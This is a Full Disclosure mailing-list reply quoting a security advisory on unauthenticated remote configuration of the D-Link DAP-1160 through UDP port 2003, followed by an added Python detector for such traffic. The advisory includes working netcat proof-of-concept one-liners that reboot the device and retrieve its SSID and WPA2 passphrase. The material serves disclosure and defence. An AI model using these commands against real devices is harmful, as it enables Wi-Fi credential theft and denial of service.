Full Disclosure mailing list archives
Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
From: Gary Baribault <gary () baribault net>
Date: Mon, 28 Jun 2010 10:29:34 -0400
Is that UDP 2003 open on the WAN interface as well?

Gary Baribault

On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
Security Advisory IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Advisory Information
--------------------
Published: 2010-06-28
Updated: 2010-06-28
Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06 1.30b10 1.31b01

Vulnerability Details
---------------------
Public References: Not Assigned
Platform: Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01. Other models and/or firmware versions may also be affected.
Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31

Background Information:
D-Link DAP-1160 is a wireless access point that allows wireless clients connectivity to wired networks. Supports the 802.11b and 802.11g protocols. WEP, WPA and WPA2 are supported.

Summary:
Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases, is possible. Unauthenticated remote reboot of the device can also be performed.

Details:
DCCD is a UDP daemon that listens on port UDP 2003 of the device, and is likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol. By sending properly formatted UDP datagrams to the dccd daemon it is possible to perform security-relevant operations without any previous authentication. It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, encryption types, keys and passphrases, along with other additional information. It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password. Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition.
POC:

- Remote reboot

    python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

- Retrieving Wi-Fi SSID

    python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
    cat ssid.txt

  (cleartext SSID displayed after "21 27 xx xx" in the received datagram)

- Retrieving WPA2 PSK

    python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
    cat pass.txt

  (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)

Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
Possible Denial-of-Service

Solutions & Workaround:
Not available

Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory

Additional information available at http://www.icysilence.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
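The advisory gives the wire bytes of the three unauthenticated dccd requests (opcode 0x05 for reboot, opcode 0x03 followed by attribute tags 21 27 / 23 27 / 24 27 for configuration reads), which is enough to write a detection rule for traffic toward UDP/2003. The following is an added example, not code from the advisory or from D-Link: a small classifier that takes captured datagrams (record format constructed here) and flags DCC reboot and configuration-read requests. The opcode and tag values are taken from the PoC strings above; the 8-byte header length and the tolerant tag scan are assumptions, since the advisory does not document the full TLV layout, and the tag 23 27 is only known to be sent with the PSK query.

```python
"""Flag unauthenticated DCC (dccd, UDP/2003) requests as described in IS-2010-004.

Added example; not part of the advisory or of D-Link's code. Opcode and
attribute bytes are taken from the advisory's PoC. The capture record format
and the sample datagrams below are constructed for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

DCC_PORT = 2003
HEADER_LEN = 8  # opcode byte + 7 reserved bytes, as in the PoC strings (assumption)

# Opcodes observed in the PoC datagrams.
OPCODES = {0x05: "reboot", 0x03: "get-config"}

# Attribute tags as they appear on the wire in the PoC queries.
# 0x23 0x27 is sent together with the PSK query; the advisory does not name it.
ATTRIBUTES = {
    b"\x21\x27": "wifi-ssid",
    b"\x23\x27": "unnamed (sent with PSK query)",
    b"\x24\x27": "wpa2-psk",
}


@dataclass
class Datagram:
    """One captured UDP datagram (constructed record format)."""
    src: str
    dst: str
    dport: int
    payload: bytes


def classify(payload: bytes) -> Optional[Dict]:
    """Describe a DCC request, or return None if the payload does not look like one."""
    if len(payload) < HEADER_LEN:
        return None
    opcode = payload[0]
    if opcode not in OPCODES:
        return None
    body = payload[HEADER_LEN:]
    # The exact TLV layout is undocumented, so scan for the known 2-byte tags
    # anywhere in the body rather than parsing a fixed structure.
    attrs = [name for tag, name in ATTRIBUTES.items() if tag in body]
    return {"op": OPCODES[opcode], "attrs": sorted(attrs)}


def severity(info: Dict) -> str:
    """Reboots and PSK reads are the worst cases named in the advisory."""
    if info["op"] == "reboot" or "wpa2-psk" in info["attrs"]:
        return "high"
    return "medium"


def scan(records: List[Datagram]) -> List[Dict]:
    """Return one alert per datagram to UDP/2003 that matches a known DCC request."""
    alerts = []
    for d in records:
        if d.dport != DCC_PORT:
            continue
        info = classify(d.payload)
        if info is None:
            continue
        alerts.append({"src": d.src, "dst": d.dst, "severity": severity(info), **info})
    return alerts


# Constructed sample capture. The DCC payloads reproduce the PoC bytes; the
# trailing 0x0a is the newline that `python -c 'print ...'` appends.
SAMPLE = [
    Datagram("192.0.2.10", "192.0.2.1", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00"),  # ordinary DNS, ignored
    Datagram("198.51.100.7", "192.0.2.1", 2003, b"\x05" + b"\x00" * 7 + b"\n"),     # reboot
    Datagram("198.51.100.7", "192.0.2.1", 2003, b"\x03" + b"\x00" * 7 + b"\x21\x27\x00\n"),  # SSID read
    Datagram("198.51.100.7", "192.0.2.1", 2003,
             b"\x03" + b"\x00" * 7 + b"\x23\x27\x00\x00\x24\x27\x00\n"),            # PSK read
    Datagram("192.0.2.22", "192.0.2.1", 2003, b"\x7f" + b"\x00" * 7),                # unknown opcode, ignored
]

if __name__ == "__main__":
    for a in scan(SAMPLE):
        print(f"[{a['severity']}] {a['src']} -> {a['dst']} dcc {a['op']} {a['attrs']}")
```

Run as a script it prints one line per flagged datagram; in practice the records would come from a capture on the WAN side of the device, which is also the quickest way to answer the question above about whether port 2003 is reachable from outside.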
Current thread:
- IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)